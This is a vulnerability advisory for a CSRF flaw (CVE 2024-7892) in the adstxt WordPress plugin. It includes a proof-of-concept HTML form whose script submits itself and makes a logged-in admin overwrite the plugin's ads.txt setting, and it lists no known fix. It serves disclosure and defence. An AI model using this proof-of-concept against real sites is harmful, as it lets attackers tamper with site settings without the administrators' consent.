adstxt Plugin <= 1.0.0 – Settings Update via CSRF | CVE 2024-7892 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

Make an admin open an HTML file containing:

```
<form id="csrfForm" action="https://www.example.com/wp-admin/admin.php?page=adstxt-plugin" method="post">
<input type="hidden" name="adstxt" value="hacked">
<input type="hidden" name="action" value="update_adstxt">  
</form>

<script>
document.getElementById('csrfForm').submit();
</script>
```

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Norbert Hofmann

Submitter

Norbert Hofmann

Submitter website

https://www.linkedin.com/in/norbert-hofmann-53761417/

Verified

Yes

WPVDB ID

c07a4992-c9a1-46a4-9a52-9e38b6d15440

Timeline

Publicly Published

2024-09-04 (about 1 year ago)

Added

2024-09-04 (about 1 year ago)

Last Updated

2024-09-04 (about 1 year ago)

Other

Published

Title

Published

2014-08-01

Title

Google Analytics MU 2.3 - google-analytics-mu-network.php Analytics Code Manipulation CSRF

Published

2024-11-28

Title

Simple Header and Footer <= 1.0.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-09-22

Title

Deliver via Shipos for WooCommerce < 3.1.0 - Cross-Site Request Forgery

Published

2014-08-01

Title

Newsletter Manager < 1.0.2 - Cross-Site Request Forgery

Published

2012-10-21

Title

White Label CMS - Cross-Site Request Forgery